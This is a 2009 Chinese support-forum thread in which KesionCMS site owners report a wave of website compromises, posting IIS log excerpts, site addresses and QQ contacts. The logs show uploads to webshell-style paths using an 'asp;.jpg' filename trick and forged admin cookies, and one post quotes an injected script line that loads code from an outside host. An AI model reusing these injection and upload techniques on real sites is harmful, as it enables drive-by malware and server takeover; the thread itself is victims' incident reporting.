账号通
    

注册

找回密码

账号  

密码  

话题
互动
会员
服务
<<返回列表上一个主题 下一个主题 打印本帖 复制本帖地址

30569

查看

80

回复
主题:[公告]针对此次挂马事件官方已联合部分受害用户报警!请广大站长参与! [收藏主题] 转到:  
i3valen 当前离线

75

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:2420 分
登录次数:32 次
注册时间:2009/7/7
最后登录:2011/12/29
i3valen 发表于:2009/9/15 14:18:00   | 只看该作者 查看该作者主题 31楼 
做在线知识付费 选科汛云开店
做官网 就用科汛智能建站系统!
当天IIS日志下载:http://www.gojx.net/weblog/ex090914.log

2、走江西旅游同业网

3、www.gojx.net

4、陶/./qq:19929917


 
 
做新职业技能培训平台 就选#科汛网校
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
7256504 当前离线

617

主题

1

广播

0

粉丝
添加关注
级别:六年级

用户积分:6143 分
登录次数:538 次
注册时间:2007/3/15
最后登录:2018/9/7
7256504 发表于:2009/9/15 16:27:00   | 只看该作者 查看该作者主题 32楼 
科汛在线商城系统(NET)
做线上考试培训 就选#科汛网校
以下是引用xcqs在2009-9-15 15:28:00的发言:

2009-09-14 14:58:16 W3SVC311 210.52.223.69 POST /UploadFiles/C00N.asp - 80 - 222.245.220.131 - 200 0 0 275
2009-09-14 14:58:17 W3SVC311 210.52.223.69 POST /KS_Editor/fckeditor/editor/css/images/help.asp;.jpg - 80 - 222.245.220.131 - 200 0 0 199
2009-09-14 14:58:38 W3SVC311 210.52.223.69 POST /Template/rss.asp nor=0&en=0&asp=0&dot=1 80 - 222.245.220.131 - 200 0 0 389

 

站名:秀衣阁

网址:www.xiuyige.com

QQ:64272435,xiuyige@qq.com

 

临时结觉方法:删除源程序,本地修改。临时放置HTML代码

 

 

IP222.245.220.131 和攻击我的是一样的。
 
一分钟快速开通线上知识店铺
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
lijia_00 当前离线

1392

主题

0

广播

0

粉丝
添加关注
级别:九年级

用户积分:1041 分
登录次数:27 次
注册时间:2009/6/10
最后登录:2013/9/5
lijia_00 发表于:2009/9/15 16:11:00   | 只看该作者 查看该作者主题 33楼 
科汛在线考试系统(NET)
有课程 找生源 就上科汛课堂街

我的就不报站名了  在科讯做站不留名的原因就是怕被黑客找到攻击

不过我也是这次的受害者,两个站被攻击,用的虚拟空间拿不到日志!

李 QQ:258213149 (24小时在线)
 
做官网 就用科汛智能建站系统!
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
haxzh 当前离线

415

主题

0

广播

0

粉丝
添加关注
级别:四年级

用户积分:3560 分
登录次数:223 次
注册时间:2008/9/2
最后登录:2011/3/14
haxzh 发表于:2009/9/15 15:43:00   | 只看该作者 查看该作者主题 34楼 
做在线知识付费 选科汛云开店
有生源 找课程 就上科汛课堂街!
大家要提高警惕!现在科讯很红,不会是同行捣的鬼吧?请官方要严查严惩,决不手软!!!!!!!
 
做官网 就用科汛智能建站系统!
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
ko3c 当前离线

50

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:421 分
登录次数:20 次
注册时间:2009/7/27
最后登录:2010/7/12
ko3c 发表于:2009/9/15 15:40:00   | 只看该作者 查看该作者主题 35楼 
做在线知识付费 选科汛云开店
做官网 就用科汛智能建站系统!

昨晚被挂之后,今早修复,但今天白天又中。

 

IIS日志没有,

 

被挂之后多出代码如下。

document.writeln('<script language="JavaScript" src="http://www.icxxw.com/image%73/logo.%73wf" type="text/javascript" id="seraph6script9519"  ><\/script>');
官方能给个解决方法吗
 
科汛商学院助您快速入门
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
做爱吧 当前离线

126

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:900 分
登录次数:18 次
注册时间:2007/6/17
最后登录:2009/10/30
做爱吧 发表于:2009/9/15 16:44:00   | 只看该作者 查看该作者主题 36楼 
科汛在线商城系统(NET)
做考试题库 就用#科汛在线考试系统!

我就一个空站,已经挂马三次了。真不知道他们图啥!

又没有几个流量!

 

今天13:09第三次挂马了。

 

正好虚拟主机到期了,

呶呶的,不玩了。
 
做官网 就用科汛智能建站系统!
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
hi0533 当前离线

73

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:781 分
登录次数:35 次
注册时间:2009/3/10
最后登录:2009/10/10
hi0533 发表于:2009/9/15 16:01:00   | 只看该作者 查看该作者主题 37楼 
做在线知识付费 选科汛云开店
一分钟快速开通线上知识店铺

1、IIS日志文件

 

2009-09-10 20:40:16 222.245.211.231 - W3SVC154 IIS514 96.0.100.151 80 POST /include/UpFileSave.asp |-|0|404_Not_Found 302 0 203 1512 375 HTTP/1.1 - ASPSESSIONIDQCBRCRBD=PPCOJMLBFOEBIJNCJLNIAPCM;+KS6wwwxxsemcom=PowerList=0&SuperTF=1&AdminName=admin&AdminPass=5c3a646ebc42cd13&RndPassword=xrd3qfw%2DonXGoDJlOjSX&SkinID=1&ModelPower=%2C%2C%2C%2C%2C%2C%2C%2C%2C&AdminLoginCode=2917&Password=469e80d32c0559f8&UserName=admin http://www.xxsem.com/include/UpFileSave.asp
2009-09-10 20:40:17 222.245.211.231 - W3SVC154 IIS514 96.0.100.151 80 GET /404.htm 404;http://www.xxsem.com/include/UpFileSave.asp 200 0 761 670 0 HTTP/1.1 - ASPSESSIONIDQCBRCRBD=PPCOJMLBFOEBIJNCJLNIAPCM;+KS6wwwxxsemcom=PowerList=0&SuperTF=1&AdminName=admin&AdminPass=5c3a646ebc42cd13&RndPassword=xrd3qfw%2DonXGoDJlOjSX&SkinID=1&ModelPower=%2C%2C%2C%2C%2C%2C%2C%2C%2C&AdminLoginCode=2917&Password=469e80d32c0559f8&UserName=admin http://www.xxsem.com/include/UpFileSave.asp
2009-09-10 20:40:20 222.245.211.231 - W3SVC154 IIS514 96.0.100.151 80 POST /include/UpFileSave.asp |-|0|404_Not_Found 302 0 203 1497 375 HTTP/1.1 - ASPSESSIONIDQCBRCRBD=PPCOJMLBFOEBIJNCJLNIAPCM;+KS6wwwxxsemcom=PowerList=0&SuperTF=1&AdminName=admin&AdminPass=5c3a646ebc42cd13&RndPassword=xrd3qfw%2DonXGoDJlOjSX&SkinID=1&ModelPower=%2C%2C%2C%2C%2C%2C%2C%2C%2C&AdminLoginCode=2917&Password=469e80d32c0559f8&UserName=admin http://www.xxsem.com/include/UpFileSave.asp
2009-09-10 20:40:21 222.245.211.231 - W3SVC154 IIS514 96.0.100.151 80 GET /404.htm 404;http://www.xxsem.com/include/UpFileSave.asp 200 0 761 670 0 HTTP/1.1 - ASPSESSIONIDQCBRCRBD=PPCOJMLBFOEBIJNCJLNIAPCM;+KS6wwwxxsemcom=PowerList=0&SuperTF=1&AdminName=admin&AdminPass=5c3a646ebc42cd13&RndPassword=xrd3qfw%2DonXGoDJlOjSX&SkinID=1&ModelPower=%2C%2C%2C%2C%2C%2C%2C%2C%2C&AdminLoginCode=2917&Password=469e80d32c0559f8&UserName=admin http://www.xxsem.com/include/UpFileSave.asp

 

 

2、你被挂的网站名称

 

上传程序后还没建站.....都没逃过

 

3、网站网址

 

http://www.xxsem.com/

 

4、你的联系人/联系电话/QQ等

 

邮箱 xxsem@qq.com

 

挂马IP 222.245.211.231
 
做官网 就用科汛智能建站系统!
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
beer 当前离线

1417

主题

0

广播

0

粉丝
添加关注
级别:九年级

用户积分:6870 分
登录次数:446 次
注册时间:2007/1/18
最后登录:2014/8/1
beer 发表于:2009/9/15 14:57:00   | 只看该作者 查看该作者主题 38楼 
科汛在线网校系统
有课程 找生源 就上科汛课堂街

顶起~~~~~

同楼上的一样

辛苦了半天现在又被挂了
 
科汛商学院助您快速入门
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
greenice 当前离线

396

主题

2

广播

0

粉丝
添加关注
级别:三年级

用户积分:2733 分
登录次数:297 次
注册时间:2009/5/20
最后登录:2018/12/28
greenice 发表于:2009/9/15 14:37:00   | 只看该作者 查看该作者主题 39楼 
科汛智能建站系统
做线上考试培训 就选#科汛网校

1、虚拟主机不提供IIS访问日志:

2、汝州绿冰阁

3、网站网址:http://www.rzlbg.cn

4、QQ:40087189
 
科汛商学院助您快速入门
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
i3valen 当前离线

75

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:2420 分
登录次数:32 次
注册时间:2009/7/7
最后登录:2011/12/29
i3valen 发表于:2009/9/15 14:20:00   | 只看该作者 查看该作者主题 40楼 
做官网 就用科汛智能建站系统!
以下是引用i3valen在2009-9-15 14:18:00的发言:
当天IIS日志下载:http://www.gojx.net/weblog/ex090914.log

2、走江西旅游同业网

3、www.gojx.net

4、陶/./qq:19929917


 

IIS日志用这个:http://www.gojx.net/weblog/ex090914.txt
 
做官网 就用科汛智能建站系统!
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
<< 返回列表
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.21094秒 powered by KesionCMS 9.0